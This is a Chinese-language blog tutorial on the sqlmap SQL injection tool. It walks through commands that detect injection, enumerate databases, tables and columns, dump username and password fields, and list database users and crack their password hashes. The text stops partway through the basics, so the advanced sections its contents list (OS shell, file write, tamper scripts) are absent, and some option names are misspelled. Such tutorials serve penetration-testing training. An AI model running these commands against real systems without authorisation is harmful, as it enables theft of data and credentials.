当前位置:   article > 正文

sqlmap使用教程

sqlmap使用教程

目录

sqlmap基础使用

1、判断是否存在注入

2、判断文本中的请求是否存在注入

3、查询当前用户下的所有数据库

4、获取数据库中的表名

5、获取表中的字段名

6、获取字段内容

7、获取数据库所有用户

8、获取数据库用户的密码

9、获取当前网站数据库的名称

10、获取当前网站数据库的用户名称

SQLMap进阶:参数讲解

1、--level 5: 探测等级

2、--is-dba:当前用户是否为管理权限

3、--roles:列出数据库管理员的角色

4、--referer:http referer头

5、--sql-shell运行自定义的sql语句

6、--os-cmd,--os-shell:运行任意操作系统的命令

7、--fire-read:从数据库服务器中读取文件

8、 --fire-write --file-dest:上传文件到数据库服务器中

SQLMap自带绕过脚本tamper

一些常用的tamper脚本:


sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。

sqlmap基础使用

1、判断是否存在注入

sqlmap.py -u url 

(如果注入点后面的参数大于等于两个,需要加双引号)

2、判断文本中的请求是否存在注入

Sqlmap.py -r desktop/1.txt 

一般在存在cookies注入的情况下使用

3、查询当前用户下的所有数据库

sqlmap.py -u url --dbs

确定网站存在注入后,用于查询当前用户下的所有数据库。如果当前用户有权限读取包含所有数据库列表信息的表,使用该命令就可以列出所有相关数据库。

4、获取数据库中的表名

sqlmap.py -u “url” -D dkeye(具体数据库) --tables

如果不加入-D来指定某一个数据库,那么会列出数据库中的所有的表。继续注入时缩写成—T,在某表中继续查询

5、获取表中的字段名

sqlmap.py -u “url” -D dkeye -T user_info(具体表名) --columns 

查询完表名后,查询该表中的字段名,在后续的注入中,—columns缩写成-C

6、获取字段内容

sqlmap.py -uurl-D dkeye -T user_info(具体表名) -C usrname password(具体字段) --dump

7、获取数据库所有用户

sqlmap.py -u url --users

列出数据库所有用户,如果当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有管理用户。

8、获取数据库用户的密码

sqlmap.py -u url --passwords

如果当前用户有读取包含用户密码的权限,sqlmap会先例举出用户,然后列出hash,并尝试破解。

9、获取当前网站数据库的名称

sqlmap.py -u url --curerent
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/煮酒与君饮/article/detail/808136
推荐阅读
相关标签
  

闽ICP备14008679号